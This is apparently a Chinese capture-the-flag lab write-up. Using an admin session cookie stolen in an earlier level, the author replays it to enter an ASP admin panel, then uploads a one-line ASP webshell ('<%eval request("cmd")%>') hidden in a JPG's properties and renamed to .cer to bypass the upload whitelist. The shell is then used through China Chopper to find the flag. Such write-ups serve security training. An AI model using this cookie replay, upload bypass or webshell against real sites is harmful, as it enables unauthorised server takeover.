提示:
1,通过修改Cookie登录后台(没用重打)2,上传SHELL!3,Flag在Web根目录(flag.php)3.上传图片时建议上传小文件,我建议用QQ表情尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,
看到了后台功能!然后要做的,就是找一个上传点,上传自己的外壳了!
靶场地址
http://59.63.200.79:8005/admin/Login.asp
1、登录后台
根据提示--------------直接抓包
上一关获取了管理员Cookie
ASPSESSIONIDSQATTCBS=JJLAMLACCEODAHFIAOCGBPLA; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
去除flag部分,如下
ASPSESSIONIDSQATTCBS=JJLAMLACCEODAHFIAOCGBPLA;ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
将原有的Cookie进行替换
登录成功
2、上传Shell
通过对后台页面研究发现,此处可能有机会上传一句话木马,且上传类型限制为白名单
看见cer。我直接就想到了上传cer文件木马,说干就干
直接上传一句话木马重命名的cer文件出现这个情况,我猜后台应该对文件内容有所过滤。
随便找一张jpg图片(正常的),选择属性--->双击--->写入一句话木马
在将这张jpg图片进行重命名为cer文件
将cer文件上传,上传成功
3、菜刀连接
连接成功后,在C盘下有flag,由于一句话木马权限不够,将flag下载到桌面
本以为到这里就结束了,后来发现对这个falg.txt文件没有操作权限。
尝试上传大马,但上传不了。D盘、E盘也点不开。
百思不得其解时,我看得见网页后缀为asp。
一下反应过来,上传包含了asp一句话木马的cer文件
<%eval request("cmd")%>
但还是没有办法下载,访问在C盘的那个flag.txt文件。
但是D盘可以打开了
4、成功拿到flag
